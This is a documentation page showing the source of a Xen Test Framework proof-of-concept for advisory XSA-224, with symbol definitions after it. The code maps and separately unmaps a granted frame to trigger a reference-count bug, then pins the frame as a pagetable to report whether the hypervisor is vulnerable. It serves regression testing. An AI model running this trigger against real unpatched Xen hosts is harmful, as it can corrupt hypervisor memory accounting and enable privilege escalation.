docs/xtf/xsa-224_2main_8c_source.html

 #include <xtf.h>

 const char test_title[] = "XSA-224 PoC";

 static uint8_t frame[PAGE_SIZE] __page_aligned_bss;

 void test_main(void)
 {
     int rc = xtf_init_grant_table(1);

     if ( rc )
         return xtf_error("Error initialising grant table: %d\n", rc);

     int domid = xtf_get_domid();

     if ( domid < 0 )
         return xtf_error("Error getting domid\n");

     /*
      * Construct gref 8 to allow frame[] to be mapped by outselves.
      */
     gnttab_v1[8].domid = domid;
     gnttab_v1[8].frame = virt_to_gfn(frame);
     smp_wmb();
     gnttab_v1[8].flags = GTF_permit_access;

     struct gnttab_map_grant_ref map = {
         .host_addr = KB(4),
         .flags = GNTMAP_host_map | GNTMAP_device_map,
         .ref = 8,
         .dom = domid,
         .dev_bus_addr = KB(4),
     };

     /*
      * Map frame[] to ourselves with both host and device mappings.
      */
     rc = hypercall_grant_table_op(GNTTABOP_map_grant_ref, &map, 1);
     if ( rc || map.status )
         return xtf_error("Error: Unable to map grant[8]: %d/%d\n",
                          rc, map.status);

     struct gnttab_unmap_grant_ref unmap = {
         .host_addr = KB(4),
         .handle = map.handle,
     };

     /*
      * Unmap the host mapping of frame[] in isolation.
      */
     rc = hypercall_grant_table_op(GNTTABOP_unmap_grant_ref, &unmap, 1);
     if ( rc || unmap.status )
         return xtf_error("Error: Unable to host unmap grant[8]: %d/%d\n",
                          rc, unmap.status);

     /*
      * Unmap the device mapping of frame[] in isolation.
      */
     unmap.host_addr = 0;
     unmap.dev_bus_addr = virt_to_maddr(frame);

     rc = hypercall_grant_table_op(GNTTABOP_unmap_grant_ref, &unmap, 1);
     if ( rc || unmap.status )
         return xtf_error("Error: Unable to bus unmap grant[8]: %d/%d\n",
                          rc, unmap.status);

     /*
      * At this point, if Xen is vulnerable to XSA-224, it will have dropped
      * one too many writeable refs from frame[].  Check, by trying to pin it
      * as a pagetable.
      */
     mmuext_op_t op =
     {
         .cmd = MMUEXT_PIN_L1_TABLE,
         .arg1.mfn = virt_to_mfn(frame),
     };

     rc = hypercall_mmuext_op(&op, 1, NULL, DOMID_SELF);

     switch ( rc )
     {
     case 0:
         return xtf_failure("Fail: Vulnerable to XSA-224\n");

     case -EINVAL:
         return xtf_success("Success: Not vulnerable to XSA-224\n");

     default:
         return xtf_error("Unexpected MMUEXT_PIN_L1_TABLE rc %d\n", rc);
     }
 }

 /*
  * Local variables:
  * mode: C
  * c-file-style: "BSD"
  * c-basic-offset: 4
  * tab-width: 4
  * indent-tabs-mode: nil
  * End:
  */
gnttab_map_grant_ref::host_addr
uint64_t host_addr
Definition: grant_table.h:226

EINVAL
#define EINVAL
Definition: errno.h:33

gnttab_unmap_grant_ref::dev_bus_addr
uint64_t dev_bus_addr
Definition: grant_table.h:251

__page_aligned_bss
#define __page_aligned_bss
Definition: compiler.h:37

gnttab_unmap_grant_ref
Definition: grant_table.h:248

GNTMAP_host_map
#define GNTMAP_host_map
Definition: grant_table.h:179

smp_wmb
#define smp_wmb()
Definition: barrier.h:36

xtf_get_domid
int xtf_get_domid(void)
Obtain the current domid.
Definition: lib.c:47

virt_to_maddr
uint64_t virt_to_maddr(const void *va)

grant_entry_v1_t::frame
uint32_t frame
Definition: grant_table.h:117

virt_to_mfn
unsigned long virt_to_mfn(const void *va)

NULL
#define NULL
Definition: stddef.h:12

xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition: report.c:38

KB
#define KB(num)
Express num in Kilobytes.
Definition: numbers.h:23

gnttab_map_grant_ref
Definition: grant_table.h:224

xtf_failure
void xtf_failure(const char *fmt,...)
Report a test failure.
Definition: report.c:94

test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition: main.c:137

mmuext_op
Definition: xen.h:355

virt_to_gfn
static unsigned long virt_to_gfn(const void *va)
Definition: mm.h:100

gnttab_unmap_grant_ref::status
int16_t status
Definition: grant_table.h:254

gnttab_map_grant_ref::status
int16_t status
Definition: grant_table.h:231

frame
static uint8_t frame[PAGE_SIZE]
Definition: main.c:23

xtf_init_grant_table
int xtf_init_grant_table(unsigned int version)
Initialise XTF&#39;s grant infrastructure.
Definition: grant_table.c:21

test_title
const char test_title[]
The title of the test.
Definition: main.c:14

grant_entry_v1_t::domid
domid_t domid
Definition: grant_table.h:110

GNTMAP_device_map
#define GNTMAP_device_map
Definition: grant_table.h:176

PAGE_SIZE
#define PAGE_SIZE
Definition: page.h:11

gnttab_v1
grant_entry_v1_t gnttab_v1[]

xtf_error
void xtf_error(const char *fmt,...)
Report a test error.
Definition: report.c:80

gnttab_unmap_grant_ref::host_addr
uint64_t host_addr
Definition: grant_table.h:250

GNTTABOP_unmap_grant_ref
#define GNTTABOP_unmap_grant_ref
Definition: grant_table.h:247

hypercall_grant_table_op
static long hypercall_grant_table_op(unsigned int cmd, void *args, unsigned int count)
Definition: hypercall.h:131

hypercall_mmuext_op
static long hypercall_mmuext_op(const mmuext_op_t ops[], unsigned int count, unsigned int *done, unsigned int foreigndom)
Definition: hypercall.h:148

gnttab_map_grant_ref::handle
grant_handle_t handle
Definition: grant_table.h:232

MMUEXT_PIN_L1_TABLE
#define MMUEXT_PIN_L1_TABLE
Definition: xen.h:333

mmuext_op::cmd
unsigned int cmd
Definition: xen.h:356

grant_entry_v1_t::flags
uint16_t flags
Definition: grant_table.h:108

DOMID_SELF
#define DOMID_SELF
Definition: xen.h:70

GTF_permit_access
#define GTF_permit_access
Definition: grant_table.h:50

uint8_t
__UINT8_TYPE__ uint8_t
Definition: stdint.h:14

GNTTABOP_map_grant_ref
#define GNTTABOP_map_grant_ref
Definition: grant_table.h:223